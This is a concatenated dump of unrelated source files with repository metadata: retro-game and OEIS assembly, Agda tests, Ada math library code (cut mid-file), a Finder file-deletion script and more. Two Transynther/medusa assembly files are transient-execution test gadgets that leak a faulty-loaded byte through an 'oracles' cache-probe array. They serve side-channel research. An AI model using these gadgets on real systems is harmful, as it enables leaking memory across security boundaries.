mac/karabiner/remove_seleced_files.scpt
dhruvmanila/dotfiles
10
4461
tell application "Finder" try set sel to the selection delete (every item of sel) end try end tell
libsrc/games/joystick.asm
andydansby/z88dk-mk2
1
105178
; ; Generic game device library ; <NAME> - 20/8/2001 ; ; $Id: joystick.asm,v 1.3 2009/01/23 08:22:27 stefano Exp $ ; XLIB joystick LIB getk .joystick ;__FASTALL__ : joystick no. in HL ld a,l cp 1 ; Stick emulation 1 (qaop-mn) jr nz,j_no1 call getk ld a,l ld l,0 or @00100000 ; TO_LOWER cp 'm' jr nz,no_fire1 set 4,l jr j_done .no_fire1 cp 'n' jr nz,no_fire2 set 5,l jr j_done .no_fire2 cp 'q' jr nz,no_up set 3,l jr j_done .no_up cp 'a' jr nz,no_down set 2,l jr j_done .no_down cp 'o' jr nz,no_left set 1,l jr j_done .no_left cp 'p' jr nz,no_right set 0,l .no_right jr j_done .j_no1 cp 2 ; Stick emulation 2 (8246-05) jr nz,j_no2 call getk ld a,l ld l,0 cp '0' jr nz,no_fire1_a set 4,l jr j_done .no_fire1_a cp '5' jr nz,no_fire2_a set 5,l jr j_done .no_fire2_a cp '8' jr nz,no_up_a set 3,l jr j_done .no_up_a cp '2' jr nz,no_down_a set 2,l jr j_done .no_down_a cp '4' jr nz,no_left_a set 1,l jr j_done .no_left_a cp '6' jr nz,no_right_a set 0,l .no_right_a jr j_done .j_no2 xor a .j_done ret
oeis/098/A098156.asm
neoneye/loda-programs
11
241282
; A098156: Interleave n+1 and 2n+1 and take binomial transform. ; 1,2,5,13,32,76,176,400,896,1984,4352,9472,20480,44032,94208,200704,425984,901120,1900544,3997696,8388608,17563648,36700160,76546048,159383552,331350016,687865856,1426063360,2952790016,6106906624,12616466432,26038239232,53687091200,110595407872,227633266688,468151435264,962072674304,1975684956160,4054449127424,8315056685056,17042430230528,34909494181888,71468255805440,146235046494208,299067162755072,611328465043456,1249045209153536,2550866976440320,5207287069147136,10625680370827264 seq $0,66373 ; a(n) = (3*n-2)*2^(n-3). add $0,2 div $0,4
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_17_1140.asm
ljhsiun2/medusa
9
102664
<filename>Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_17_1140.asm .global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r11 push %r13 push %r14 push %rcx push %rdi push %rdx push %rsi // Store lea addresses_RW+0xcd35, %r11 nop nop and %rsi, %rsi movb $0x51, (%r11) nop nop nop nop nop and %rsi, %rsi // Store lea addresses_D+0x13a35, %rdx clflush (%rdx) nop nop nop and %r13, %r13 mov $0x5152535455565758, %r11 movq %r11, (%rdx) nop nop nop add $65017, %rsi // Store lea addresses_WT+0x82b5, %rsi nop nop inc %r14 movw $0x5152, (%rsi) nop nop and $42024, %rdi // Store lea addresses_normal+0x1d249, %r14 clflush (%r14) nop nop nop nop nop xor $8403, %rdi movb $0x51, (%r14) nop nop and %r13, %r13 // Load mov $0x4ed8550000000635, %r13 nop nop nop xor $55229, %rdx mov (%r13), %ecx nop nop nop cmp $35874, %r14 // Store lea addresses_RW+0xafb5, %rdx nop nop cmp $18336, %rsi mov $0x5152535455565758, %rcx movq %rcx, %xmm7 movups %xmm7, (%rdx) nop nop nop and $80, %rsi // Store lea addresses_US+0xbdb5, %rcx nop nop nop sub $26365, %rsi mov $0x5152535455565758, %rdi movq %rdi, %xmm4 vmovups %ymm4, (%rcx) dec %rdx // Store mov $0x235, %rsi nop xor %rdx, %rdx movw $0x5152, (%rsi) nop nop add %r11, %r11 // Store lea addresses_A+0x13bf5, %r14 nop nop sub %r11, %r11 movw $0x5152, (%r14) nop add $8345, %r11 // Store lea addresses_WT+0x63, %rdx nop dec %r11 mov $0x5152535455565758, %rcx movq %rcx, %xmm6 vmovntdq %ymm6, (%rdx) nop nop nop nop dec %r11 // Faulty Load mov $0x4ed8550000000635, %rcx nop nop and $18372, %r11 mov (%rcx), %rdx lea oracles, %r13 and $0xff, %rdx shlq $12, %rdx mov (%r13,%rdx,1), %rdx pop %rsi pop %rdx pop %rdi pop %rcx pop %r14 pop %r13 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0, 'same': False, 'type': 'addresses_NC'}, 'OP': 'LOAD'} {'dst': {'NT': True, 'AVXalign': False, 'size': 1, 'congruent': 7, 'same': False, 'type': 'addresses_RW'}, 'OP': 'STOR'} {'dst': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 10, 'same': True, 'type': 'addresses_D'}, 'OP': 'STOR'} {'dst': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 7, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'} {'dst': {'NT': True, 'AVXalign': False, 'size': 1, 'congruent': 2, 'same': False, 'type': 'addresses_normal'}, 'OP': 'STOR'} {'src': {'NT': True, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_NC'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 7, 'same': False, 'type': 'addresses_RW'}, 'OP': 'STOR'} {'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 7, 'same': False, 'type': 'addresses_US'}, 'OP': 'STOR'} {'dst': {'NT': False, 'AVXalign': True, 'size': 2, 'congruent': 4, 'same': False, 'type': 'addresses_P'}, 'OP': 'STOR'} {'dst': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 5, 'same': False, 'type': 'addresses_A'}, 'OP': 'STOR'} {'dst': {'NT': True, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'} [Faulty Load] {'src': {'NT': True, 'AVXalign': False, 'size': 8, 'congruent': 0, 'same': True, 'type': 'addresses_NC'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'00': 17} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_19_514.asm
ljhsiun2/medusa
9
16732
.global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r8 push %rbx push %rcx push %rdi push %rsi lea addresses_A_ht+0x8442, %rsi lea addresses_WT_ht+0x155e2, %rdi sub $65411, %r11 mov $107, %rcx rep movsl nop nop and $32253, %r12 lea addresses_WC_ht+0x1c442, %rcx clflush (%rcx) nop nop nop nop nop add $35198, %r8 mov (%rcx), %esi nop nop nop and $27862, %rsi lea addresses_WC_ht+0xe42, %r11 nop nop nop nop cmp %rbx, %rbx mov (%r11), %r12 nop add $34090, %r12 pop %rsi pop %rdi pop %rcx pop %rbx pop %r8 pop %r12 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r13 push %r15 push %r9 push %rcx // Store mov $0x391, %r13 xor %rcx, %rcx mov $0x5152535455565758, %r9 movq %r9, %xmm1 vmovntdq %ymm1, (%r13) nop nop dec %rcx // Faulty Load lea addresses_normal+0x9042, %rcx nop nop dec %r15 vmovups (%rcx), %ymm3 vextracti128 $1, %ymm3, %xmm3 vpextrq $1, %xmm3, %r12 lea oracles, %r15 and $0xff, %r12 shlq $12, %r12 mov (%r15,%r12,1), %r12 pop %rcx pop %r9 pop %r15 pop %r13 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_P', 'AVXalign': False, 'size': 32, 'NT': True, 'same': False, 'congruent': 0}} [Faulty Load] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 32, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}} {'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 4, 'NT': True, 'same': False, 'congruent': 9}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 9}, 'OP': 'LOAD'} {'34': 19} 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 */
test/Succeed/Issue5506.agda
cruhland/agda
1,989
14562
<reponame>cruhland/agda -- Andreas, 2021-08-18, issue #5506 reported by alexarice -- A crash in the forcing methodology introduced in 2.6.1 -- that surfaced with the removal of auto-inlining in 2.6.2. -- {-# OPTIONS --no-forcing #-} -- fixes -- {-# OPTIONS --auto-inline #-} -- fixes {-# OPTIONS -v tc.lhs.unify.force:100 #-} open import Agda.Builtin.Nat data Unit : Set where unit : Unit data Ctx : Nat → Set where -- index needed cons : (m : Nat) (A : Unit) → Ctx (suc m) mutual data P : (n : Nat) (Γ : Ctx n) → Set -- Needs to be mutual {-# NOINLINE getFocus #-} getFocus : (n : Nat) (A : Unit) → Unit getFocus n A = A -- needs to be A, not unit data P where c : (n : Nat) -- n is forced (A : Unit) → P (suc n) (cons n (getFocus n A)) test : (n : Nat) (Γ : Ctx n) → P n Γ → Nat test n Γ (c m A) = n + m -- ^ n := suc m fixes the issue -- WAS: -- Panic: Pattern match failure in do expression at -- src/full/Agda/TypeChecking/Rules/LHS/Unify.hs:1313:7-14 -- when checking that the pattern c _ _ _ _ has type P n Γ -- Expect: type-checks without errors.
Cubical/HITs/Sn/Base.agda
limemloh/cubical
0
14480
{-# OPTIONS --cubical --safe #-} module Cubical.HITs.Sn.Base where open import Cubical.HITs.Susp open import Cubical.Data.Nat open import Cubical.Data.NatMinusOne open import Cubical.Data.Empty open import Cubical.Foundations.Prelude S₊ : ℕ₋₁ → Type₀ S₊ neg1 = ⊥ S₊ (suc n) = Susp (S₊ n) S : ℕ → Type₀ S n = S₊ (ℕ→ℕ₋₁ n)
test/Succeed/Issue1944-Stream.agda
alhassy/agda
3
7033
<filename>test/Succeed/Issue1944-Stream.agda -- AIM XXIII, Andreas, 2016-04-24 -- Overloaded projections and projection patterns -- {-# OPTIONS -v tc.proj.amb:30 #-} -- {-# OPTIONS -v tc.lhs.split:20 #-} module _ where import Common.Level open import Common.Prelude hiding (map) open import Common.Equality module M (A : Set) where record Stream : Set where coinductive field head : A tail : Stream open M using (Stream) open module S = M.Stream public -- This is a bit trickier for overloading projections -- as it has a parameter with is of a record type -- with the same projections. record _≈_ {A : Set}(s t : Stream A) : Set where coinductive field head : head s ≡ head t tail : tail s ≈ tail t open module B = _≈_ public ≈refl : ∀{A} {s : Stream A} → s ≈ s head ≈refl = refl tail ≈refl = ≈refl ≈sym : ∀{A} {s t : Stream A} → s ≈ t → t ≈ s head (≈sym p) = sym (head p) tail (≈sym p) = ≈sym (tail p) module N (A : Set) (s : Stream A) where open module SS = Stream s public myhead : A myhead = SS.head -- cannot use ambiguous head here map : {A B : Set} → (A → B) → Stream A → Stream B head (map f s) = f (head s) tail (map f s) = map f (tail s) map_id : {A : Set}(s : Stream A) → map (λ x → x) s ≈ s head (map_id s) = refl tail (map_id s) = map_id (tail s) repeat : {A : Set}(a : A) → Stream A head (repeat a) = a tail (repeat a) = repeat a repeat₂ : {A : Set}(a₁ a₂ : A) → Stream A ( (head (repeat₂ a₁ a₂))) = a₁ (head (tail (repeat₂ a₁ a₂))) = a₂ (tail (tail (repeat₂ a₁ a₂))) = repeat₂ a₁ a₂ repeat≈repeat₂ : {A : Set}(a : A) → repeat a ≈ repeat₂ a a ( (head (repeat≈repeat₂ a))) = refl (head (tail (repeat≈repeat₂ a))) = refl (tail (tail (repeat≈repeat₂ a))) = repeat≈repeat₂ a
programs/oeis/182/A182769.asm
jmorken/loda
1
25581
; A182769: Beatty sequence for (4 + sqrt(2))/2. ; 2,5,8,10,13,16,18,21,24,27,29,32,35,37,40,43,46,48,51,54,56,59,62,64,67,70,73,75,78,81,83,86,89,92,94,97,100,102,105,108,110,113,116,119,121,124,127,129,132,135,138,140,143,146,148,151,154,157,159,162,165,167,170,173,175,178,181,184,186,189,192,194,197,200,203,205,208,211,213,216,219,221,224,227,230,232,235,238,240,243,246,249,251,254,257,259,262,265,268,270,273,276,278,281,284,286,289,292,295,297,300,303,305,308,311,314,316,319,322,324,327,330,332,335,338,341,343,346,349,351,354,357,360,362,365,368,370,373,376,378,381,384,387,389,392,395,397,400,403,406,408,411,414,416,419,422,425,427,430,433,435,438,441,443,446,449,452,454,457,460,462,465,468,471,473,476,479,481,484,487,489,492,495,498,500,503,506,508,511,514,517,519,522,525,527,530,533,536,538,541,544,546,549,552,554,557,560,563,565,568,571,573,576,579,582,584,587,590,592,595,598,600,603,606,609,611,614,617,619,622,625,628,630,633,636,638,641,644,646,649,652,655,657,660,663,665,668,671,674,676 mov $7,$0 mov $8,$0 add $0,1 pow $0,2 mov $2,$0 mov $3,1 lpb $2 add $3,1 mov $4,$2 trn $4,2 lpb $4 add $3,4 trn $4,$3 add $5,2 lpe sub $2,$2 lpe mov $1,$5 mov $6,$7 mul $6,2 add $1,$6 div $1,2 add $1,2 add $1,$8
programs/oeis/120/A120177.asm
karttu/loda
0
174812
<filename>programs/oeis/120/A120177.asm ; A120177: a(1)=9; a(n)=floor((47+sum(a(1) to a(n-1)))/5). ; 9,11,13,16,19,23,27,33,39,47,56,68,81,97,117,140,168,202,242,291,349,419,502,603,723,868,1042,1250,1500,1800,2160,2592,3110,3732,4479,5375,6450,7740,9288,11145,13374,16049,19259,23111,27733,33279,39935,47922,57507,69008,82810,99372,119246,143095,171714,206057,247268,296722,356066,427280,512736,615283,738339,886007,1063209,1275850,1531020,1837224,2204669,2645603,3174724,3809668,4571602,5485922,6583107,7899728,9479674,11375609,13650730,16380876,19657052,23588462,28306154,33967385,40760862,48913035,58695642,70434770,84521724,101426069,121711283,146053539,175264247,210317096,252380516,302856619,363427943,436113531,523336237,628003485,753604182,904325018,1085190022,1302228026,1562673631,1875208358,2250250029,2700300035,3240360042,3888432050,4666118460,5599342152,6719210583,8063052699,9675663239,11610795887,13932955064,16719546077,20063455293,24076146351,28891375621,34669650746,41603580895,49924297074,59909156489,71890987786,86269185344,103523022412,124227626895,149073152274,178887782729,214665339274,257598407129,309118088555,370941706266,445130047519,534156057023,640987268428,769184722113,923021666536,1107625999843,1329151199812,1594981439774,1913977727729,2296773273275,2756127927930,3307353513516,3968824216219,4762589059463,5715106871355,6858128245626,8229753894751,9875704673702,11850845608442,14221014730130,17065217676156,20478261211388,24573913453665,29488696144398,35386435373278,42463722447933,50956466937520,61147760325024,73377312390029,88052774868035,105663329841642,126795995809970,152155194971964,182586233966357,219103480759628,262924176911554,315509012293865,378610814752638,454332977703165,545199573243798,654239487892558,785087385471069,942104862565283,1130525835078340,1356631002094008,1627957202512809,1953548643015371,2344258371618445,2813110045942134,3375732055130561,4050878466156673,4861054159388008,5833264991265610,6999917989518732,8399901587422478 mov $2,32 lpb $0,1 sub $0,1 add $2,4 mov $1,$2 div $2,5 add $2,$1 lpe add $0,841 mov $3,$0 mov $4,$2 div $4,6 mov $0,$4 add $0,$3 mov $1,$0 sub $1,837
constants/deco_constants.asm
Dev727/ancientplatinum
28
177143
; decoration types const_value = 1 const DECO_PLANT const DECO_BED const DECO_CARPET const DECO_POSTER const DECO_DOLL const DECO_BIGDOLL ; DecorationNames indexes (see data/decorations/names.asm) const_value = 1 const PUT_IT_AWAY const MAGNAPLANT const TROPICPLANT const JUMBOPLANT const TOWN_MAP_D const FAMICOM const SUPER_NES const NINTENDO_64 const VIRTUAL_BOY const GOLD_TROPHY const SILVER_TROPHY const SURF_PIKA_DOLL const _BED const _CARPET const _POSTER const _DOLL const BIG_ const FEATHERY_BED const PIKACHU_BED const PINK_BED const POLKADOT_BED const RED_CARPET const BLUE_CARPET const YELLOW_CARPET const GREEN_CARPET ; DoDecorationAction2.DecoActions indexes (see engine/overworld/decorations.asm) const_value = 1 const SET_UP_BED const PUT_AWAY_BED const SET_UP_CARPET const PUT_AWAY_CARPET const SET_UP_PLANT const PUT_AWAY_PLANT const SET_UP_POSTER const PUT_AWAY_POSTER const SET_UP_CONSOLE const PUT_AWAY_CONSOLE const SET_UP_BIG_DOLL const PUT_AWAY_BIG_DOLL const SET_UP_DOLL const PUT_AWAY_DOLL const SET_UP_ORNAMENT const PUT_AWAY_ORNAMENT deco: MACRO const DECO_\1 enum DECOFLAG_\1 ENDM ; decorations: ; - DecorationAttributes (see data/decorations/attributes.asm) ; - DecorationIDs (see data/decorations/decorations.asm) const_def 1 enum_start ; FindOwnedBeds.beds values (see engine/overworld/decorations.asm) const BEDS deco FEATHERY_BED deco PINK_BED deco POLKADOT_BED deco PIKACHU_BED ; FindOwnedCarpets.carpets values (see engine/overworld/decorations.asm) const CARPETS deco RED_CARPET deco BLUE_CARPET deco YELLOW_CARPET deco GREEN_CARPET ; FindOwnedPlants.plants values (see engine/overworld/decorations.asm) const PLANTS deco MAGNAPLANT deco TROPICPLANT deco JUMBOPLANT ; FindOwnedPosters.posters values (see engine/overworld/decorations.asm) const POSTERS deco TOWN_MAP deco PIKACHU_POSTER deco CLEFAIRY_POSTER deco JIGGLYPUFF_POSTER ; FindOwnedConsoles.consoles values (see engine/overworld/decorations.asm) const CONSOLES deco FAMICOM deco SNES deco N64 deco VIRTUAL_BOY ; FindOwnedBigDolls.big_dolls values (see engine/overworld/decorations.asm) const BIG_DOLLS deco BIG_SNORLAX_DOLL deco BIG_ONIX_DOLL deco BIG_LAPRAS_DOLL ; FindOwnedOrnaments.ornaments values (see engine/overworld/decorations.asm) const DOLLS deco PIKACHU_DOLL deco SURF_PIKACHU_DOLL deco CLEFAIRY_DOLL deco JIGGLYPUFF_DOLL deco BULBASAUR_DOLL deco CHARMANDER_DOLL deco SQUIRTLE_DOLL deco POLIWAG_DOLL deco DIGLETT_DOLL deco STARMIE_DOLL deco MAGIKARP_DOLL deco ODDISH_DOLL deco GENGAR_DOLL deco SHELLDER_DOLL deco GRIMER_DOLL deco VOLTORB_DOLL deco WEEDLE_DOLL deco UNOWN_DOLL deco GEODUDE_DOLL deco MACHOP_DOLL deco TENTACOOL_DOLL NUM_NON_TROPHY_DECOS EQU __enum__ deco GOLD_TROPHY_DOLL deco SILVER_TROPHY_DOLL NUM_DECOS EQU __enum__
alloy4fun_models/trashltl/models/17/KneYp94xmiRajRu4E.als
Kaixi26/org.alloytools.alloy
0
5337
open main pred idKneYp94xmiRajRu4E_prop18 { always all f: File | (f in Trash releases f in Protected) } pred __repair { idKneYp94xmiRajRu4E_prop18 } check __repair { idKneYp94xmiRajRu4E_prop18 <=> prop18o }
oeis/220/A220853.asm
neoneye/loda-programs
11
166434
<filename>oeis/220/A220853.asm ; A220853: Denominators of the fraction (30*n+7) * binomial(2*n,n)^2 * 2F1([1/2 - n/2, -n/2], [1], 64)/(-256)^n, where 2F1 is the hypergeometric function. ; 1,64,16384,1048576,1073741824,68719476736,17592186044416,1125899906842624,4611686018427387904,295147905179352825856,75557863725914323419136,4835703278458516698824704,4951760157141521099596496896,316912650057057350374175801344,81129638414606681695789005144064,5192296858534827628530496329220096,85070591730234615865843651857942052864,5444517870735015415413993718908291383296,1393796574908163946345982392040522594123776,89202980794122492566142873090593446023921664 mul $0,2 seq $0,46161 ; a(n) = denominator of binomial(2n,n)/4^n. pow $0,2
projects/07/MemoryAccess/PointerTest/PointerTest.asm
feliposz/nand2tetris
0
1846
// push constant 3030 @3030 D=A @SP A=M M=D @SP M=M+1 // pop pointer 0 @SP M=M-1 A=M D=M @THIS M=D // push constant 3040 @3040 D=A @SP A=M M=D @SP M=M+1 // pop pointer 1 @SP M=M-1 A=M D=M @THAT M=D // push constant 32 @32 D=A @SP A=M M=D @SP M=M+1 // pop this 2 @2 D=A @THIS D=D+M @R13 M=D @SP M=M-1 A=M D=M @R13 A=M M=D // push constant 46 @46 D=A @SP A=M M=D @SP M=M+1 // pop that 6 @6 D=A @THAT D=D+M @R13 M=D @SP M=M-1 A=M D=M @R13 A=M M=D // push pointer 0 @THIS D=M @SP A=M M=D @SP M=M+1 // push pointer 1 @THAT D=M @SP A=M M=D @SP M=M+1 // add @SP M=M-1 A=M D=M @SP M=M-1 A=M D=D+M @SP A=M M=D @SP M=M+1 // push this 2 @2 D=A @THIS A=D+M D=M @SP A=M M=D @SP M=M+1 // sub @SP M=M-1 A=M D=M @SP M=M-1 A=M D=M-D @SP A=M M=D @SP M=M+1 // push that 6 @6 D=A @THAT A=D+M D=M @SP A=M M=D @SP M=M+1 // add @SP M=M-1 A=M D=M @SP M=M-1 A=M D=D+M @SP A=M M=D @SP M=M+1
bb-runtimes/runtimes/ravenscar-full-stm32g474/gnat/s-libdou.adb
JCGobbi/Nucleo-STM32G474RE
0
3088
<reponame>JCGobbi/Nucleo-STM32G474RE<gh_stars>0 ------------------------------------------------------------------------------ -- -- -- GNAT COMPILER COMPONENTS -- -- -- -- S Y S T E M . L I B M _ D O U B L E -- -- -- -- B o d y -- -- -- -- Copyright (C) 2014-2021, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- -- -- -- -- -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- This is the Ada Cert Math specific version of s-libdou.adb -- When Cody and Waite implementation is cited, it refers to the -- Software Manual for the Elementary Functions by <NAME>, Jr. -- and <NAME>, published by Prentice-Hall Series in Computational -- Mathematics. Copyright 1980. ISBN 0-13-822064-6. -- When Hart implementation is cited, it refers to -- "Computer Approximations" by <NAME>, published by Krieger. -- Copyright 1968, Reprinted 1978 w/ corrections. ISBN 0-88275-642-7. with Ada.Numerics; use Ada.Numerics; with System.Libm; use System.Libm; with System.Libm_Double.Squareroot; package body System.Libm_Double is subtype LF is Long_Float; pragma Assert (LF'Machine_Radix = 2); pragma Assert (LF'Machine_Mantissa = 53); LF_HM : constant Integer := Long_Float'Machine_Mantissa / 2; Sqrt_Epsilon_LF : constant Long_Float := Sqrt_2 ** (1 - Long_Float'Machine_Mantissa); type Long_Float_Table is array (Positive range <>) of Long_Float; -- A1 (i) = Float (2**((1-i)/16)) A1_Tab_LF : constant Long_Float_Table := (1.0, Long_Float'Machine (Root16_Half), Long_Float'Machine (Root16_Half**2), Long_Float'Machine (Root16_Half**3), Long_Float'Machine (Root16_Half**4), Long_Float'Machine (Root16_Half**5), Long_Float'Machine (Root16_Half**6), Long_Float'Machine (Root16_Half**7), Long_Float'Machine (Root16_Half**8), Long_Float'Machine (Root16_Half**9), Long_Float'Machine (Root16_Half**10), Long_Float'Machine (Root16_Half**11), Long_Float'Machine (Root16_Half**12), Long_Float'Machine (Root16_Half**13), Long_Float'Machine (Root16_Half**14), Long_Float'Machine (Root16_Half**15), 0.5); -- A2 (i) = 2**((1-2i)/16) - A1(2i) A2_Tab_LF : constant Long_Float_Table := (Root16_Half - Long_Float'Machine (Root16_Half), Root16_Half**3 - Long_Float'Machine (Root16_Half**3), Root16_Half**5 - Long_Float'Machine (Root16_Half**5), Root16_Half**7 - Long_Float'Machine (Root16_Half**7), Root16_Half**9 - Long_Float'Machine (Root16_Half**9), Root16_Half**11 - Long_Float'Machine (Root16_Half**11), Root16_Half**13 - Long_Float'Machine (Root16_Half**13), Root16_Half**15 - Long_Float'Machine (Root16_Half**15)); -- Intermediary functions function Reconstruct_Pow (Z : Long_Float; P : Integer; M : Integer) return Long_Float; procedure Reduce_044 (X : Long_Float; Reduced_X : out Long_Float; P : out Integer) with Post => abs (Reduced_X) < 0.044; function Reduce_1_16 (X : Long_Float) return Long_Float with Post => abs (X - Reduce_1_16'Result) <= 0.0625; function Reduce_1_16 (X : Long_Float) return Long_Float is (LF'Machine_Rounding (X * 16.0) * (1.0 / 16.0)); package Long_Float_Approximations is new Generic_Approximations (Long_Float, Mantissa => 53); use Long_Float_Approximations; -- Local declarations procedure Reduce_Half_Pi_Large (X : in out LF; N : LF; Q : out Quadrant); procedure Split_Veltkamp (X : Long_Float; X_Hi, X_Lo : out Long_Float) with Post => X = X_Hi + X_Lo; function Multiply_Add (X, Y, Z : LF) return LF is (X * Y + Z); -- The following functions reduce a positive X into the range -- -ln (2) / 2 .. ln (2) / 2 -- It returns a reduced X and an integer N such that: -- X'Old = X'New + N * Log (2) -- It is used by Exp function -- The result should be correctly rounded procedure Reduce_Ln_2 (X : in out Long_Float; N : out Integer) with Pre => abs (X) <= Long_Float'Ceiling (Long_Float'Pred (709.78271_28337_79350_29149_8) * Inv_Ln_2); -- @llr Reduce_Ln_2 Long_Float -- The following is postcondition doesn't hold. Suspicious "=" ??? -- Post => abs (X) <= Ln_2 / 2.0 and -- X'Old = X + Long_Float (N) * Ln_2; -- The reduction is used by the Sin, Cos and Tan functions. procedure Reduce_Half_Pi (X : in out Long_Float; Q : out Quadrant) with Pre => X >= 0.0, Post => abs (X) <= Max_Red_Trig_Arg; -- @llr Reduce_Half_Pi Long_Float -- The following functions reduce a positive X into the range -- -(Pi/4 + E) .. Pi/4 + E, with E a small fraction of Pi. -- -- The reason the normalization is not strict is that the computation of -- the number of times to subtract half Pi is not exact. The rounding -- error is worst for large arguments, where the number of bits behind -- the radix point reduces to half the mantissa bits. -- While it would be possible to correct for this, the polynomial -- approximations work well for values slightly outside the -Pi/4 .. Pi/4 -- interval, so it is easier for both error analysis and implementation -- to leave the reduction non-strict, and assume the reduced argument is -- within -0.26 * Pi .. 0.26 * Pi rather than a quarter of pi. -- The reduction is guaranteed to be correct to within 0.501 ulp for -- values of X for which Ada's accuracy guarantees apply: -- abs X <= 2.0**(T'Machine_Mantissa / 2) -- For values outside this range, an attempt is made to have significance -- decrease only proportionally with increase of magnitued. In any case, -- for all finite arguments, the reduction will succeed, though the reduced -- value may not agree with the mathematically correct value in even its -- sign. --------------------- -- Reconstruct_Pow -- --------------------- function Reconstruct_Pow (Z : Long_Float; P : Integer; M : Integer) return Long_Float is -- Cody and Waite implementation (in "**" function page 84) -- The following computation is carried out in two steps. First add 1 to -- Z and multiply by 2**(-P/16). Then multiply the result by 2**M. Result : Long_Float; begin Result := A1_Tab_LF (P + 1) * Z; return Long_Float'Scaling (Result, M); end Reconstruct_Pow; ---------------- -- Reduce_044 -- ---------------- procedure Reduce_044 (X : Long_Float; Reduced_X : out Long_Float; P : out Integer) is -- Cody and Waite implementation (in "**" function page 84) -- The output is: -- P is the biggest odd Integer in range 1 .. 15 such that -- 2^((1-P)/16) <= X. -- Reduced_X equals 2 * (X-2^(-P/16)) / (X + 2^(-P/16)). -- abs (Reduced_X) <= max (2^(2-P/16)-2^(1-P/16)) <= 0.443. begin P := 1; if X <= A1_Tab_LF (9) then P := 9; end if; if X <= A1_Tab_LF (P + 4) then P := P + 4; end if; if X <= A1_Tab_LF (P + 2) then P := P + 2; end if; Reduced_X := (X - A1_Tab_LF (P + 1)) - A2_Tab_LF ((P + 1) / 2); Reduced_X := Reduced_X / (X + A1_Tab_LF (P + 1)); Reduced_X := Reduced_X + Reduced_X; end Reduce_044; -------------------- -- Instantiations -- -------------------- package Instantiations is function Acos is new Generic_Acos (LF); function Atan2 is new Generic_Atan2 (LF); end Instantiations; -------------------- -- Split_Veltkamp -- -------------------- procedure Split_Veltkamp (X : Long_Float; X_Hi, X_Lo : out Long_Float) is M : constant LF := 0.5 + 2.0**(1 - LF'Machine_Mantissa / 2); begin X_Hi := X * M - (X * M - X); X_Lo := X - X_Hi; end Split_Veltkamp; ----------------- -- Reduce_Ln_2 -- ----------------- procedure Reduce_Ln_2 (X : in out Long_Float; N : out Integer) is L1 : constant := Long_Float'Leading_Part (Ln_2, LF_HM); L2 : constant := Long_Float'Leading_Part (Ln_2 - L1, LF_HM); L3 : constant := Ln_2 - L2 - L1; XN : constant Long_Float := Long_Float'Rounding (X * Inv_Ln_2); begin -- The argument passed to the function is smaller than Ymax * 1/log(2) -- No overflow is possible for N (Ymax is the largest machine number -- less than Log (LF'Last)). N := Integer (XN); X := ((X - XN * L1) - XN * L2) - XN * L3; if X < -Ln_2 / 2.0 then X := X + Ln_2; N := N - 1; end if; if X > Ln_2 / 2.0 then X := X - Ln_2; N := N + 1; end if; end Reduce_Ln_2; -------------------- -- Reduce_Half_Pi -- -------------------- procedure Reduce_Half_Pi (X : in out Long_Float; Q : out Quadrant) is K : constant := Pi / 2.0; Bits_N : constant := 3; Max_N : constant := 2.0**Bits_N - 1.0; Max_X : constant LF := LF'Pred (K * Max_N); -- About 3.5 * Pi Bits_C : constant := LF'Machine_Mantissa - Bits_N; C1 : constant LF := LF'Leading_Part (K, Bits_C); C2 : constant LF := K - C1; N : constant LF := LF'Machine_Rounding (X * K**(-1)); begin if not X'Valid then X := X - X; Q := 0; elsif abs X > Max_X then Reduce_Half_Pi_Large (X, N, Q); else pragma Assert (if X'Valid then abs N <= Max_N); X := (X - N * C1) - N * C2; Q := Integer (N) mod 4; end if; end Reduce_Half_Pi; -------------------------- -- Reduce_Half_Pi_Large -- -------------------------- procedure Reduce_Half_Pi_Large (X : in out LF; N : LF; Q : out Quadrant) is type Int_64 is range 